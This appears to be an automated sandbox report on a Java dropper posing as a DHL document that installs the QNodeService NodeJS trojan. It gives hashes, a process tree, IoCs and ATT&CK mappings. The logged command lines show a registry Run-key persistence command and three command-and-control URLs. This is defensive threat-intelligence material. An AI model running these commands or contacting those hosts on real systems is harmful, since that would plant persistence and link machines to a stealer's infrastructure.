qnodeservice | 31a4ae2cbeff17ff5530e9da4429d72364bfc10d40736834d715878f49ceee06

General

Target

DHL-DOCUMENT.jar
Size

11KB
MD5

fa9976171fb96b7a94807b4719dc4953
SHA1

6cc5948ed866b36928844e607a742d6ee7cc6281
SHA256

31a4ae2cbeff17ff5530e9da4429d72364bfc10d40736834d715878f49ceee06
SHA512

b76b606421a7ffbb18fd9bd88eafed6dad17ddfe13d6364e557485562ded9a72fe7730c4141e2b361010b6a351f1d9ed9a1b47e03371feacea8283ea05ff71f7

Score

10^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
564	node.exe
2600	node.exe

Loads dropped DLL 4 IoCs

pid	Process
2600	node.exe
2600	node.exe
2600	node.exe
2600	node.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2600	node.exe
2600	node.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2804 wrote to memory of 564	2804	java.exe	70
PID 2804 wrote to memory of 564	2804	java.exe	70
PID 564 wrote to memory of 3800	564	node.exe	71
PID 564 wrote to memory of 3800	564	node.exe	71
PID 3800 wrote to memory of 1864	3800	cmd.exe	72
PID 3800 wrote to memory of 1864	3800	cmd.exe	72
PID 564 wrote to memory of 2600	564	node.exe	76
PID 564 wrote to memory of 2600	564	node.exe	76

QNodeService NodeJS Trojan 1 IoCs

resource	yara_rule
behavioral2/files/0x000200000001a661-116.dat	family_qnodeservice

Adds Run entry to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-d69681b3 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-d69681b3.cmd\""	reg.exe

QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
trojan qnodeservice

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	node.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	node.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	wtfismyip.com
13	wtfismyip.com

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\DHL-DOCUMENT.jar
1⤵
- Suspicious use of WriteProcessMemory
PID:2804
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
  C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://result.loseyourip.com --central-base-url https://result123.chickenkiller.com --central-base-url https://result.mmansersverocm.cc
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-d69681b3" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-d69681b3.cmd\"""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3800
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-d69681b3" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-d69681b3.cmd\""
      4⤵
      Adds Run entry to start application
      PID:1864
- - C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
    C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://result.loseyourip.com --central-base-url https://result123.chickenkiller.com --central-base-url https://result.mmansersverocm.cc
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Checks processor information in registry
    PID:2600

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/564-115-0x0000035368180000-0x0000035368181000-memory.dmp

Filesize
4KB

Download
memory/2600-121-0x0000035E098C0000-0x0000035E098C1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing